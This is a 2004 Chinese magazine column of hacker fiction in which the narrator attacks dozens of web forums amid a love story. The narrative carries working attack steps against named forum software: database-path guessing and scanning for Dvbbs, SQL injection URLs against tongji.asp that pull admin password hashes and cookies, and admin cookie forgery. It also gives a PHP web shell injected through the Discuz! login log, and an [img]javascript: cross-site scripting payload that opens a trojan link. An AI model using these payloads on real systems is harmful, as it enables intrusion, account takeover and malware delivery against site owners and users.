《黑客营》续集(41)：遗失的代码

网络通信

苗得雨 · 2004年10月18日

　　《黑客营传奇》从第28期刊出以来，深受读者的好评。为了答谢读者，《黑客营传奇》续集经过精心包装终于与你见面了。

　　根据《黑客营传奇》的读者意见，在续集中我们仍然保留了大家喜爱的小说形式，但在篇幅上加大黑客技术的比例。非常欢迎大家对我们的栏目提出建议(Mail:Internet@cpcw.com)。

　　我，鹿采薇，从小大姐就告诉我，要得到不易得到的东西须用非常之手段，这是黑客营的行事风格。

　　曾有几次看到大姐在镜前潸然泪下，我知道大姐忘不了他，那个她惟一爱的男人──雷轨。他抛弃了她。

　　大姐说“留香客栈，我要黑了你”。她恨那个男人，那是他网上惟一的窝。于是我彻底摧毁了留香客栈的服务器。

　　大姐说我不理解心痛的滋味。其实我知道，我爱的男人却又爱上了只听名字就让人心生怜爱的女人──雪柔。“Q下的阴谋”进行得异常完美，我黑了她的QQ。

　　大姐说我不懂爱情。其实我知道什么是爱，因为我爱听雨，他就是那个能够让我感觉到爱是什么滋味的男人。为了爱，我倾泻着“天使的愤怒”，不惜闯入他的邮箱。

　　大姐说我体会不到恨的感觉。其实我知道，因为我给自己最恨的女人安装了最恶毒的木马。“寂寞高手 灭门惨案”的传闻在江湖中流传至今。

　　大姐说我看不懂江湖。我的确看不懂江湖。“仇杀”让人意乱情迷，让人手足无措……

　　钟表指针以它固有的形式走着，黑客营的故事仍然在继续着，带动着那些思绪的步伐。突然的温暖、突然的寒冷，就像我俩热恋时的情绪，漂浮在不规则的旋律之上。这个城市永远残留着我黑客的梦想，也理所当然地遗留下了我们那段昔日的真情……

　　时间：2012年

　　地点：槐园公墓

　　雪柔在车中看着听雨，他站在那里已经有20多分钟了，他一直没有动。目光久久地停在那座坟墓的碑文和照片上。他似乎想要倾诉一个故事，倾诉一段尘封在心中多年的往事。走过了八个年头，听雨爱她依然爱得那么深沉。

　　“妈妈，爸爸怎么还不进车里来？她是谁？”“鹿采薇，一个很喜欢很喜欢你的阿……”她戛然而止，她实在不知道如何向这个只有5岁的孩子解释这一切。迟早有一天，这个孩子会长大成人，会知道那是他的妈妈……

　　时间：2004年

　　地点：黑客营

　　鹿采薇接到了最新的任务，黑客营的人在近一段时间内，要全力攻击70多个论坛。从留香客栈开始，大姐似乎在有目的地指挥他们完成一件什么事情。

　　从目前网络的情况来看，他们需要攻击的论坛多数都是采用了动网先锋的引擎，这是一款以ASP为源程序编写的论坛。通常想攻陷、控制这样的论坛，必须得有论坛管理员的密码，怎样才能得到呢？

　　鹿采薇清楚，动网的论坛使用Access的数据库，通常来说配置论坛的管理员如果是个菜鸟或懒虫的话，那么鹿采薇仅用猜就能够猜出对方的数据库位置，然后直接将数据库文件下载回来破译出管理员密码。

　　一般而言，多数初级管理员都会按照动网配置说明书上的介绍一步一步操作，就是说存放数据库的文件目录通常都会惯性地使用如DATA、DATABASE、BD、MDB等。所以在决定攻击的论坛中，鹿采薇会先在浏览器中输入诸如“http:/bbs.cpcw.com/database”或“http:/bbs.cpcw.com/mdb”的网址进行测试。如果浏览器返回的信息显示“HTTP错误404-找不到文件”，就可以直接判断出这个网站中并没有她要找的这个目录。所以每当她看到屏幕上显示“HTTP错误403-禁止访问”时，她就知道她已经找到了她所需要的东西了。

　　注意：为了方便大家理解阅读，本文中所列出的网址均为示例，并非真实地址。

　　以前大姐曾说过，只要找到了数据库所在的目录，那么找到数据库文件也就指日可待了。鹿采薇会将一些常用的数据库地址如data.mdb、db.mdb、database.asp等添加到X-Scan的CGI数据库中，或者用一些黑客字典来生成数据库地址，然后单独建一个数据库，把它添加到X-Scan的CGI数据库中。然后只扫描CGI漏洞，过一段时间扫描完毕，假设显示的扫描结果为“/data/bbsdb.asp”，就表示成功地扫描到了数据库文件。接下来她就可以用下载工具将这个数据库直接下载下来，将数据库的扩展名改成.mdb就可以打开这个数据库了。

　　不过鹿采薇知道，为了防止数据库被下载后轻易破解，通常数据库的密码都会用MD5这种加密算法进行加密。但加密之后的MD5仍然可以使用工具暴力破解出来。但是，要成功就得靠运气了。

　　鹿采薇更喜欢使用论坛自身的漏洞进行攻击。在动网论坛中，由于其tongji.asp文件没有过滤用户提交SQL查询的输入，导致远程攻击者可以利用这个漏洞进行SQL攻击，进而威胁论坛或服务器安全。最令鹿采薇兴奋的是这个手段对DVBBS VER 6.0.0及6.0.0 SP1、SP2都有效，无论对方的数据库是Access还是MS SQL。

　　鹿采薇在黑名单中挑选了一个符合要求的论坛。她不知道自己这次是否能够成功，虽然她在黑客营内部做过测试，但是她现在仍然没有十足的把握。她小心翼翼地输入网址“http://bbs.cpcw.com/dvbbs/index.asp”，然后查询管理员的名字。管理员的名字并不是什么神秘的东西，她可以在用户列表或者论坛中轻易地找到。她在浏览器地址栏中输入“http://bbs.cpcw.com/dvbbs/tongji.asp?orders=2&N=8”，她看到了管理员的名字，鹿采薇记下了自己找到的用户名，接下来她又在地址栏中输入“http://bbs.cpcw.com/dvbbs/tongji.asp?orders=2&N=10%20userclass,”，这样她很快地就查到这个人在论坛中的身份，鹿采薇注意到了那个具有最高权限的人物。

　　下一步她需要做的就是在地址栏中输入“http://bbs.cpcw.com/dvbbs/tongji.asp?orders=2&N=10%20userid,”，她得到了想要的管理员的位置。

　　接下来鹿采薇只需要在IE浏览器中输入“http://bbs.cpcw.com/dvbbs/tongji.asp?orders=2&N=10%20userpassword,”，就会看到论坛中用户的密码，当然这些都是经过MD5加密处理过的，但这对她来说已经足够了。

　　最后通过输入“http://bbs.cpcw.com/dvbbs/tongji.asp?orders=2&N=10%20usercookies,”，可以轻松得到论坛管理员的Usercookies值，一般为0。鹿采薇就这样轻松地获得了论坛管理员计算机中的Cookies内容，她可以通过在本机中伪造管理员的Cookies来入侵论坛。如果她输入“http://bbs.cpcw.com/dvbbs/tongji.asp?orders=2&N=10%20quesion,”还可以得到论坛中用户忘记密码时的密码提示问题，输入“http://bbs.cpcw.com/dvbbs/tongji.asp?orders=2&N=10%20answer,”可以得到那个倒霉的家伙的问题答案，虽然也是加密的。

　　鹿采薇在这个论坛中注册了一个用户名，她要夺取这个网站的一切。

　　她通过运行Cookies管理软件IECV，选择“View”菜单下的“Obsolete cookie file”，就可以看到自己的电脑中的Cookies文件。通常来说第一个Cookies文件就是刚刚在论坛中注册时生成的，她在它前面打上“√”，然后右键单击了界面中央的Aspsky，选择弹出菜单中的“编辑Cookie的内容”，开始自由地编辑自己的Cookies内容了，她把Cookies内容进行了简单的替换。最后关闭该软件，并关闭浏览器。重新输入该论坛的地址，论坛是她的了……

　　其实鹿采薇最喜欢挑战的是Discuz！论坛。在Discuz！论坛中，有一个install.php文件的初始化错误漏洞，通过它鹿采薇可以在logging.php中写入恶意代码，然后调用那个文件来产生一个Shell控制整个网站。而且整个过程不用注册任何账户，只需要打开Discuz！即可。

　　鹿采薇的手段很简单，她只需要打开Discuz！，找到登录用户名的地方输入＜?phpinfo();，然后在输入密码的地方输入你要输入的任何密码，当然密码的前面需要加上“?”、“＞”这两个符号，因为密码的前两位是明文显示的，这样illegallog.php里面保存的就是：

　　＜?phpinfo(); ?＞*****x 127.0.0.1 1022383175

　　此时鹿采薇就可以随意查看PHP论坛的设置了，如果这个论坛的register_globals设置是否为on，那么继续在登录口输入＜?passthru($cmd)；?＞，直接调用http://bbs.cpcw.com/forumdata/illegallog.php？cmd=dir过滤掉垃圾信息，然后向下分析就可以得到你想要的东西了。有的时候可能会出现网站因为太火而文件太大导致IE崩溃的问题，所以鹿采薇会用＜？reaname($a，$b)；？＞将php的文件shell改成jpg格式的图片，上传到主机。

　　接着输入“http://bbs.cpcw.com/forumdata/illegallog.p...chments/Jam.php”，再输入“http://bbs.cpcw.com/attachments/Jam.php”。

　　于是一个看似绝对安全的PHP论坛就这样被攻陷了。

　　时间：2004年

　　地点：医院

　　“夏如兰，你做的事情有意义吗？”雷轨的愤怒其实本不是因为夏如兰，而是由于雪柔还在手术室生死未卜。“为了一个源代码你值得吗？为了凑齐这个程序的代码你需要黑掉上万台电脑？或许当年我早就应该删除我的保存的其中的一段代码，至少没有了代码雪柔也不会这样”。激动的雷轨将全部的过错归于眼前这个女人的贪婪。

　　“这段代码之所以现在支离破碎，不就是因为你当年年轻气盛在偷取的时候将分解程序写错了才导致的吗？这个程序的作者为了这个程序已经付出了生命。”女人面色苍白地对雷轨说，她心中更加无法理解眼前这个男人在几年前还称自己为女友而今却为了另外一个女孩儿对自己暴跳如雷。

　　显然夏如兰的话刺痛了雷轨。“他的死不是因为我！他是突发脑溢血死亡的！这跟我没有关系，你不用拿这种话来压我。”雷轨更愤怒了。

　　“死了的天才程序员David Hunt中文名字叫夏云飞！”

　　“什么？！他叫夏云飞？难道……”

　　“我就是他惟一的女儿。”

　　鹿采薇坐在电脑前，她最后的一个任务是攻陷一个UBB论坛，她从来没有接触过这个论坛，她漫无目的地在网上搜寻着有关这个论坛的一切，她很快发现，或许跨站脚本攻击对于UBB论坛来说是一个好方法。因为她发现UBB论坛的代码中有一个Bug，[img]和[/img]这对标签是UBB代码中经常会用到的，用来引用一个图片。但是在[img]和[/img]中如果插入的不是图片而是Javascript脚本，论坛同样会傻乎乎地执行。此时你想都可以想到，你只需要[img]javascript:alert(“攻击代码”)[/img]，当有人点击这个帖子就会弹出一个对话框。

　　鹿采薇稍加改动，将代码写成了[img]javascript:alert(“攻击代码”);self.open(“http://木马”)[/img]。将包含代码的帖子发出之后，她就开始像钓鱼一样等待着那个管理员的到来……